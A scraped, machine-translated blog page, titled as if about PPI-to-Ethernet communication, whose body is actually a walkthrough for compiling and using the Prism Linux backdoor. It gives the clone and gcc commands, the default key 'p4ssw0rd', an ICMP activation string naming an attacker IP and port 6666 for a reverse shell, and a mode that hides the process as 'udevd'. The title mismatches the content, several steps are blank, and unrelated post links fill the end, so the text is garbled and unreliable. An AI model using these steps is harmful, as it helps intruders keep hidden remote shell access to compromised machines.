PPI to Ethernet and IFIX Ethernet Communication

2023-01-30  

Support platform

Function

Project address

git clone https://github.com/andreafabrizi/prism.git

compile

gcc <..OPTIONS..> -Wall -s -o prism prism.c

options are as follows:

ICMP mode

The back door using this mode will wait for the ICMP packet that contains the host/port connection information in the background. Through the private key can prevent third parties from access to access. The back door process accepts the Ping package activation.

can modify the key, the default is p4ssw0rd

You can see the mode as ICMP

Attack machine (172.16.100.182):

Meat Chicken (172.16.100.134):

Attack machine (172.16.100.182):

Send ICMP package

The content is as follows:
p4ssw0rd 172.16.100.182 6666 QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ

and then shell.

static mode

Try to connect hard -coded IP: PORT

You can see the custom process name as udevd

Re -compilation

Attack machine (172.16.100.182):

Meat Chicken (172.16.100.134):

View process

Get shell

source

Related Posts

MYSQL school pairing set/case -sensitive/sqlmode practice

eSP8266 debug A

spark2.0 Study

spark2.0 Study

PPI to Ethernet and IFIX Ethernet Communication

Random Posts

The Beauty of Programming 2.4 1 The meaning of

mysql string intercept Andy

one -click deployment and installation of MySQL script (CentOS 7)

POJ 1753 FLIP Game [enumeration]

[Simple filter algorithm] Common filtering algorithm explanation and routine